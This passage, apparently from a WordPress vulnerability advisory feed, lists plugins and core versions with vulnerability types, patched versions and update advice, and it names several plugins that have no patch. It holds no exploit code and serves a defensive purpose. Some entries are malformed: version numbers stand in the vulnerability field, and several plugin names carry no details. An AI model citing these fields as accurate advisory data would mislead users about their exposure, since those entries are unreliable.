Patched Version: 1.5.35
Recommended Action: Update to version 1.5.35, or a newer patched version

Plugin: Simple Membership

Vulnerability: Open Redirect
Patched Version: 4.4.2
Recommended Action: Update to version 4.4.2, or a newer patched version

Plugin: Logo Showcase – Responsive Logo Carousel, Logo Slider & Logo Grid

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: iQ Block Country

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.2.12
Recommended Action: Update to version 1.2.12, or a newer patched version

Plugin: Zoho SalesIQ – Live chat, chatbots, and visitor tracking

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: WooCommerce Email Test

Vulnerability: Sensitive Data Exposure
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: OAuth client Single Sign On for WordPress ( OAuth 2.0 SSO )

Vulnerability: Missing Authorization
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: Magic Fields

Vulnerability: Cross-Site Scripting via custom-write-panel-id Parameter
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Giveaway

Plugin: Simple 301 Redirects By BetterLinks – Easy Redirect Manager for WP, 404 Error Log & More

Vulnerability: 2.0.3
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Adblock Blocker

Core: WordPress

Vulnerability: Denial of Service via XML #2
Patched Version: 3.7.4
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.4, 3.8.4, 3.9.2

Plugin: TerraClassifieds – Simple Classifieds Plugin

Plugin: Dynamic XML Sitemaps Generator for Google

Vulnerability: Cross-Site Request Forgery to Plugin Settings Changes
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: BigContact Contact Page

Vulnerability: Cross-Site Request Forgery leading to Plugin Settings Updates
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Digital Downloads – Content Restriction

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Bing Site Verification plugin using Meta Tag

Plugin: WooCommerce Multivendor Marketplace – REST API

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Order/Order Note Disclosure, Order Note Addition via REST API
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Newsletter Meenews

Vulnerability: Cross-Site Scripting
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: Cryptocurrency Widgets – Price Ticker & Coins List

Vulnerability: 2.6.5
Patched Version: 2.6.6
Recommended Action: Update to version 2.6.6, or a newer patched version

Plugin: WordPress Classifieds Plugin – Ad Directory & Listings by AWP Classifieds

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: YASR – Yet Another Star Rating Plugin for WordPress

Vulnerability: Authenticated (Subscriber+) Cross-Site Scripting via Shortcodes
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Perfmatters

Vulnerability: Missing Authorization
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in widgets_watch_data function
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Social Like Box and Page by WpDevArt

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 0.8.41
Recommended Action: Update to version 0.8.41, or a newer patched version

Plugin: miwoftp

Vulnerability: Cross-Site Request Forgery leading to Remote Code Execution
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Server-Side Request Forgery leading to Host Information Disclosure
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: Social Media Share Buttons & Social Sharing Icons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: FL3R FeelBox

Vulnerability: Cross-Site Request Forgery leading to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce Ship to Multiple Addresses

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.8.6
Recommended Action: Update to version 3.8.6, or a newer patched version

Plugin: 10Web Map Builder for Google Maps

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.72
Recommended Action: Update to version 1.0.72, or a newer patched version

Plugin: Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress

Vulnerability: Information Disclosure
Patched Version: 5.0.2
Recommended Action: Update to version 5.0.2, or a newer patched version

Plugin: Menu Cart for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.12.0
Recommended Action: Update to version 2.12.0, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Cross-Site Request Forgery via pms-cross-promotion.php
Patched Version: 3.10.4
Recommended Action: Update to version 3.10.4, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Enable Accessibility

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses

Vulnerability: Improper Access Controls
Patched Version: 2.0.29
Recommended Action: Update to version 2.0.29, or a newer patched version

Plugin: Logo Showcase – Responsive Logo Carousel, Logo Slider & Logo Grid

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: WP Photo Album Plus

Vulnerability: Stored Cross-Site Scripting
Patched Version: 8.1.00
Recommended Action: Update to version 8.1.00, or a newer patched version

Plugin: Simple SEO

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.13
Recommended Action: Update to version 1.8.13, or a newer patched version

Plugin: SW Product Bundles

Plugin: Leaflet Map

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.13
Recommended Action: Update to version 3.2.13, or a newer patched version

Plugin: RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 4.19.2
Recommended Action: Update to version 4.19.2, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 3.1.10
Recommended Action: Update to version 3.1.10, or a newer patched version

Plugin: Ultimate Carousel For Elementor

Plugin: Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress

Vulnerability: Authenticated (Administrator+) SQL Injection via ‘s’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Image Regenerate & Select Crop

Vulnerability: Missing Authorization on multiple AJAX actions
Patched Version: 7.2.0
Recommended Action: Update to version 7.2.0, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Cloak Front End Email

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.9.2
Recommended Action: Update to version 1.9.2, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection via WP_Query
Patched Version: 3.7.37
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.37, 3.8.37, 3.9.35, 4.0.34, 4.1.34, 4.2.31, 4.3.27, 4.4.26, 4.5.25, 4.6.22, 4.7.22, 4.8.18, 4.9.19, 5.0.15, 5.1.12, 5.2.14, 5.3.11, 5.4.9, 5.5.8, 5.6.7, 5.7.5, 5.8.3

Plugin: Resume Submissions & Job Postings

Plugin: WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.1.3
Recommended Action: Update to version 1.8.1.3, or a newer patched version

Plugin: Site Offline Or Coming Soon Or Maintenance Mode

Vulnerability: Cross-Site Request Forgery and Cross-Site Scripting
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Premium Seo Pack – Light Version

Vulnerability: Local File Disclosure and Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: No API Amazon Affiliate

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.4.0
Recommended Action: Update to version 4.4.0, or a newer patched version

Plugin: Finalist

Plugin: Evaluate

Plugin: Rencontre – Dating Site

Vulnerability: Privilege Escalation
Patched Version: 3.11
Recommended Action: Update to version 3.11, or a newer patched version

Plugin: Elementor Addons by Livemesh

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 7.2.4
Recommended Action: Update to version 7.2.4, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Missing Access Control leading to Authenticated (Subscriber+) Sensitive Information Disclosure
Patched Version: 3.4.11
Recommended Action: Update to version 3.4.11, or a newer patched version

Plugin: Library Viewer

Vulnerability: Open Redirect via ‘redirect_to’
Patched Version: 2.0.6.1
Recommended Action: Update to version 2.0.6.1, or a newer patched version

Plugin: Log HTTP Requests

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Virim

Plugin: spnbabble

Plugin: Async JavaScript

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.20.02.27
Recommended Action: Update to version 2.20.02.27, or a newer patched version

Plugin: Staff / Employee Business Directory for Active Directory

Vulnerability: Insufficient Escaping of Stored LDAP Values
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Authenticated (Contributor+) Server-Side Request Forgery in template_importer
Patched Version: 2.6.7
Recommended Action: Update to version 2.6.7, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Authenticated (Contributor+) PHP Object Injection
Patched Version: 5.12.5
Recommended Action: Update to one of the following versions, or a newer patched version: 5.12.5, 6.1.0

Plugin: Solidres – Hotel booking plugin for WordPress

Plugin: SEO Redirection Plugin – 301 Redirect Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.4
Recommended Action: Update to version 7.4, or a newer patched version

Core: WordPress

Vulnerability: Misconfiguration That Allows Trigger of New Installation
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.7, 5.2.8, 5.3.5, 5.4.3, 5.5.2

Plugin: New Adman

Vulnerability: Cross-Site Request Forgery via plugin_menu
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Full Path Disclosure
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Timetable and Event Schedule by MotoPress

Vulnerability: Arbitrary User’s Hashed Password/Email/Username Disclosure
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Pinpoint Booking System – #1 WordPress Booking Plugin

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 2.9.9.2.9
Recommended Action: Update to version 2.9.9.2.9, or a newer patched version

Plugin: Favicon by RealFaviconGenerator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.21
Recommended Action: Update to version 1.3.21, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.7.0.1
Recommended Action: Update to version 3.7.0.1, or a newer patched version

Plugin: Futurio Extra

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: SRS Simple Hits Counter

Vulnerability: 1.04
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Float menu – awesome floating side menu

Vulnerability: Arbitrary Menu Deletion via Cross-Site Request Forgery
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: User Rights Access Manager

Vulnerability: Access Restriction Bypass
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.9
Recommended Action: Update to one of the following versions, or a newer patched version: 2.0.9, 2.1.1

Plugin: Avada (Fusion) Builder

Vulnerability: Reflected Cross-Site Scripting via User Register Element
Patched Version: 3.11.2
Recommended Action: Update to version 3.11.2, or a newer patched version

Plugin: DTracker

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Authenticated SQL Injection
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: Easy Digital Downloads – Pushover notifications

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Live Chat & AI Chatbots – onWebChat

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: Albo Pretorio On line

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6.4
Recommended Action: Update to version 4.6.4, or a newer patched version

Plugin: News Announcement Scroll

Vulnerability: Authenticated (Admininstrator+) Stored Cross-Site Scripting
Patched Version: 9.0.0
Recommended Action: Update to version 9.0.0, or a newer patched version

Plugin: Mediabay – Media Library Folders

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting Vulnerability
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: W3 Total Cache

Vulnerability: Server Side Request Forgery
Patched Version: 0.9.7.4
Recommended Action: Update to version 0.9.7.4, or a newer patched version

Plugin: Intuitive Custom Post Order

Vulnerability: Missing Authorization to Authenticated Settings Change
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Essential Addons for Elementor Pro

Vulnerability: Unauthenticated Server-Side Request Forgery
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: Sayfa Sayac

Plugin: Login | Login Page | Login Logo | Rename Login Page | Custom Login Page | Temporary Users | Rebrand Login | Login Captcha

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: salient-core

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more

Vulnerability: Cross-Site Request Forgery to Arbitrary Log Deletion
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.9.9
Recommended Action: Update to version 2.9.9, or a newer patched version

Plugin: OTP Login Woocommerce (Login with OTP)

Vulnerability: Authentication Bypass to Privilege Escalation
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.22
Recommended Action: Update to version 2.0.22, or a newer patched version

Plugin: Booking Ultra Pro Appointments Booking Calendar Plugin

Vulnerability: Missing Authorization via save_fields_settings
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: PPC Tracker WordPress Plugin

Vulnerability: Stored Cross-Site Scripting via IP
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Admin Management Xtended

Vulnerability: Missing Authorization Checks
Patched Version: 2.4.0.1
Recommended Action: Update to version 2.4.0.1, or a newer patched version

Plugin: myLinksDump

Plugin: CataBlog

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.7.1.1
Recommended Action: Update to version 2.7.1.1, or a newer patched version

Plugin: Weather Station

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8.13
Recommended Action: Update to version 3.8.13, or a newer patched version

Plugin: Delete All Comments

Plugin: Simple Site Verify

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Mail Masta

Vulnerability: SQL Injection via subscriber_email parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: ImageMagick Engine

Vulnerability: Cross-Site Request Forgery to Remote Command Execution
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Request Forgery to OAuth Service Disconnection
Patched Version: 3.4.34
Recommended Action: Update to version 3.4.34, or a newer patched version

Plugin: Mercado Pago payments for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.7.0
Recommended Action: Update to version 6.7.0, or a newer patched version

Plugin: Easy FAQ with Expanding Text

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: Sensitive Information Disclosure
Patched Version: 7.3.1
Recommended Action: Update to version 7.3.1, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Cross-Site Request Forgery via ‘clear_page_cache’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Missing Authorization in ‘ajax_deactivate’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: JavaScript Injection
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: Elementor Addons by Livemesh

Vulnerability: No subtitle
Patched Version: 6.8
Recommended Action: Update to version 6.8, or a newer patched version

Plugin: Yoast SEO: Local

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 14.9
Recommended Action: Update to version 14.9, or a newer patched version

Plugin: Custom Login

Vulnerability: Missing Authorization
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: CM Answers – Powerful WordPress Forum Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.10.43
Recommended Action: Update to version 7.10.43, or a newer patched version

Plugin: Search Logger – Know What Your Visitors Search

Plugin: Easy Embed for HubSpot Forms, CTAs, Links, Files & add HubSpot to WP Search Results

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP App Maker

Plugin: Customer Reviews for WooCommerce

Vulnerability: Cross-Site Request Forgery via manual review reminders
Patched Version: 5.38.2
Recommended Action: Update to version 5.38.2, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via cg_id
Patched Version: 19.1.5.1
Recommended Action: Update to version 19.1.5.1, or a newer patched version

Plugin: Survey Maker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: WordPress Sentinel

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Prevent files / folders access

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload in mo_media_restrict_page
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: SQL Injection
Patched Version: 3.8.9
Recommended Action: Update to version 3.8.9, or a newer patched version

Plugin: Custom Map

Plugin: Export All Posts, Products, Orders, Refunds & Users

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Eventr

Plugin: Customer Service Software & Support Ticket System

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.13
Recommended Action: Update to version 5.13, or a newer patched version

Plugin: Securimage-WP-Fixed

Plugin: Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection

Vulnerability: SQL Injection
Patched Version: 6.930
Recommended Action: Update to version 6.930, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Missing Authorization
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: Biometric Login For WooCommerce

Vulnerability: Unauthenticated Privilege Escalation
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Campaign URL Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: College publisher Import

Plugin: WP Spell Check

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 9.3
Recommended Action: Update to version 9.3, or a newer patched version

Plugin: Responsive Plus – Starter Templates, Advanced Features and Customizer Settings for Responsive Theme.

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.6.9
Recommended Action: Update to version 2.6.9, or a newer patched version

Plugin: A Page Flip Book

Vulnerability: Directory Traversal
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Unauthenticated SQL Injection
Patched Version: 8.1.5
Recommended Action: Update to version 8.1.5, or a newer patched version

Plugin: Careerfy

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: Custom Content Shortcode

Vulnerability: Authenticated Arbitrary File Access / Local File Inclusion
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Authenticated Code Injection
Patched Version: 4.1.0.2
Recommended Action: Update to version 4.1.0.2, or a newer patched version

Plugin: Login | Login Page | Login Logo | Rename Login Page | Custom Login Page | Temporary Users | Rebrand Login | Login Captcha

Vulnerability: 1.1.1
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: WordPress Calls to Action

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Post to CSV by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Google XML Sitemap for Mobile

Vulnerability: Cross-Site Request Forgery via mobile_sitemap_generate
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YaySMTP – WP SMTP Plugin with Full Email Log & 15+ SMTP Services

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: Conversador

Plugin: Read More Without Refresh

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: MW WP Form

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 5.0.2
Recommended Action: Update to version 5.0.2, or a newer patched version

Plugin: Blogger Importer

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.6
Recommended Action: Update to version 0.6, or a newer patched version

Plugin: WP Meta SEO

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 4.5.3
Recommended Action: Update to version 4.5.3, or a newer patched version

Plugin: Post Category Image With Grid and Slider

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: Simple File List

Vulnerability: Arbitrary File Deletion
Patched Version: 4.2.8
Recommended Action: Update to version 4.2.8, or a newer patched version

Plugin: HMS Testimonials

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.11
Recommended Action: Update to version 2.0.11, or a newer patched version

Plugin: Premium Courses & eLearning with Paid Memberships Pro for LearnDash, LifterLMS, Sensei LMS & TutorLMS

Vulnerability: Courses for Membership Add On <= 1.2.3
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: User meta shortcodes

Plugin: Premmerce Redirect Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.12
Recommended Action: Update to version 1.0.12, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘loadSettings’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WordPress RokBox

Plugin: WP Mobile Detector

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: CookieYes – Cookie Banner for Cookie Consent (Easy to setup GDPR/CCPA Compliant Cookie Notice)

Vulnerability: Authenticated Stored Cross-Site Scripting and Authorization Bypass
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Launcher: Coming Soon & Maintenance Mode

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.12
Recommended Action: Update to version 1.0.12, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 2.25.2
Recommended Action: Update to version 2.25.2, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Insecure Direct Object Reference to Comment Rating Increase/Decrease
Patched Version: 7.6.4
Recommended Action: Update to version 7.6.4, or a newer patched version

Plugin: Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX

Vulnerability: Gutenberg Blocks for Post Grid <= 2.4.9
Patched Version: 2.4.10
Recommended Action: Update to version 2.4.10, or a newer patched version

Plugin: Download Manager

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.7.95
Recommended Action: Update to version 2.7.95, or a newer patched version

Plugin: Social Metrics

Plugin: Caddy – Smart Side Cart for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.8
Recommended Action: Update to version 1.9.8, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Stored Cross-Site Scripting
Patched Version: 6.0.3.4
Recommended Action: Update to version 6.0.3.4, or a newer patched version

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Missing Authorization to User Import
Patched Version: 5.5.2
Recommended Action: Update to version 5.5.2, or a newer patched version

Plugin: YOP Poll

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.7.4
Recommended Action: Update to version 5.7.4, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Missing Authorization on openai_settings_option_callback
Patched Version: 4.4.8
Recommended Action: Update to version 4.4.8, or a newer patched version

Plugin: EmbedPress – Embed PDF, PDF 3D FlipBook, Instagram Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Maps & Upload PDF Documents

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Plugin: WP MLM SOFTWARE PLUGIN

Plugin: Greenshift – animation and page builder blocks

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.8.9
